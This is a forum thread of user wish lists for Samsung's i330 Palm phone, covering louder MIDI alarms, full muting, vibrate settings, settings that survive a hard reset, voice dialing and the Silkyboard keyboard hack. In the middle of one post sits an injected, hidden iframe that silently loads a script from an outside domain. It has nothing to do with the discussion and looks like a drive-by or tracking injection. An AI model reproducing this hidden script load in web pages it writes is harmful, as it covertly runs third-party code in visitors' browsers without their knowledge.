OK, thanks to the good folks at Samsung many of our wishes came true with the I330. They were obviosly paying very close attention. A few members have mentioned their concerns about the 330 and so why not start another request thread for those we'd like addressed with future models? I'll start.
1. I'd like the ability to use the MIDI ringers for my alarm. I often use my 330 as an alarm clock and need something louder than the cirp or alarm tones available.
2. I'd like to be able to turn the sound off COMPLETELY. I thought this would be addressed on the 330 and we're almost there. I was in a meeting today though and when I started up Bejeweled everyone looked at me as the icons fell. Lets get this taken care of.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
1. I'd like to make the sound turn off even after hard reset (i've had to hard reset a few times and been in meetings where i've got to deal with the annoying reset sound plus loud beeps as i search for "prefs" to turn the sound off).
2. ability to turn vibrate on with any level of ringer (e.g., 2 plus vibrate)
3. better pop-up keyboard (guess that's really Palm) -- i'd like one that made a keyboard length-wise
4. why can't digitizer work with phone on?
5. ability to search for signal immediately without turning phone off and back on
6. expansion slot would be nice if (a) didn't add bulk and (b) there was also an mp3 player (otherwise 16MB is fine for now)
7. picture caller ID program
8. not having the screen turn on automatically for no reason would be nice
A lot of people are complaining about the screen turning on randomly, whether when initiating a data call, business connect, or for simply a mystical function. How about the ability to turn the screen off completely and have the device perform all of its functions with the lights out. Sort of like a "hold" button on an MP3 player, if you will, to keep the device from turning on.
3. Faster cpu to have the ability to play video clips from the web.
4. Pocket PC OS with Internet Explorer on it. Seems much more user friendly
5. More skins
6. Download ringers
7. MP3 Player
It seems like alot of these will be fixed with the introduction of the I500 or I600. I would be leaning towards the I600 because of the expansion slot and the Pocket PC OS but it doesn't have a touch screen. Go figure. And, since I am stuck with Sprint, I now know that the I600 will not be offered to Sprint customers.
1. ability to use midi ringers for third party applications on the Palm side (e.g. Bigclock)
2. ability to turn on vibrate with any level of sound
3. ability to program the "memo key on the left side (e.g. to end a phone call while staying in a Palm application)
4. support for saving phone settings (speed dial, voice dial) and restore after hard reset
5. SDK, especially support for full screen applications and FlashPro
6. a wireless sync option (Bluetooth or 80211.b) that would attach to the bottom of the phone, or at least information on how the keyboard and camera interface through that port in the SDK
In addition to much of the above... I'd like the Speed Dial to do two things.
(1) Save settings so they return following a hard reset
(2) Be capable of searching databases other than just the Palm Address Book (TakePhone, for example, allows you to search the address book or another address application such as Key Contacts).
Samsung may have been listening, but Kyocera delaying putting out another device until they got it right. I just got the Kyocera 7135 and it blows any phone away. I've had the Qualcomm PdQ 1900, and a Samsung SPH I-300.
Samsung's phone system (not the Palm system) just isn's user friendly. Kyocera's is great. The clam design doesn't pose a problem at all, and the sceen is outstanding.
Anyone looking at the I-330 should seriously look at the 7135 first. Comes with a built in MP3 player, PhotoSuite, and an expansion card slot. And no, it really isn't all that big. Kinda like a Motorola flip phone of steroids.
We all know about how i330 is basically an update of i300 so both remain basically, bar-type. With i500, Samsung is going clamshell.
So, the question I want to ask of others here is, what form factor would you like to see come from Samsung? After i500, I mean.
A 320x480 super-duper PDA-first device? A 240x320 bar-type (an evolution of the i330 form factor) to make it similar to Pocket PC Phone Edition devices? A 320x320 clamshell? Even smaller than i500 160x160 clamshell with simplicity at a low price?
What I would most like to see is voice dial by reading the number (i.e. "3" "3" "0" "7" "5" "8" "8" "3" "2" "3"). Some phones have this and I would LOVE to have it on the I330. SInce the soft keyboard makes it difficult to dial by touch, the "universal" voice dial would be a great feature for hands-free car operation!

Thanks for the reply. Yeah, I know it is available through voice command, but I still wish it was part of the phone. After using the phone for a couple of days, I think I found something else I liked better on my last phone -- You should be able to turn on the speakerphone before a call connects. On the Sanyo 4500, you could press the speakerphone button at any time. If the phone was not connected it would ask for a voice dial command. It would also be nice to be able to embed a character in the dial string that would turn the speaker on. That way I could have a voice dial command for "Bill at Work" and another for "Bill at Work Speaker" that would dial the phone and then go into speakerphone mode.
Oh yeah, here's another thing I miss that the Handera had. The Handera also has a "soft" graffiti area and they wrote a "keyboard" hack that replaces the graffiti area with the keyboard and replaces the graffiti area when you close the keyboard. That's a great idea...

gwalborn, sounds like you're describing Silkyboard. With a simple pen stroke, I switch back and forth between keyboard and graffiti area. Keys are programmable too.
Thanks for the hint. I had heard of Silkyboard, but was unaware that it was capable of displaying a keyboard in the graffiti area. I'll check it out...
UPDATE 02/19/03:
I got Silkyboard and it's GREAT with this phone. It does exactly what I was looking for! They barely talk about the fact that it uses the soft graffiti area of the i330 (and others, apparently). They should hype this more! Mark that one off my "wish list".

I wish that when I forget to make sure my phone is on and try to connect to Vision for mail with Eudora or use the Internet browser, that I would receive a reminder to turn on the phone rather than an error message. When I do this now the program continues to try to connect while I'm waiting for the phone to come on, and then Eudora times out and gives me another error message.
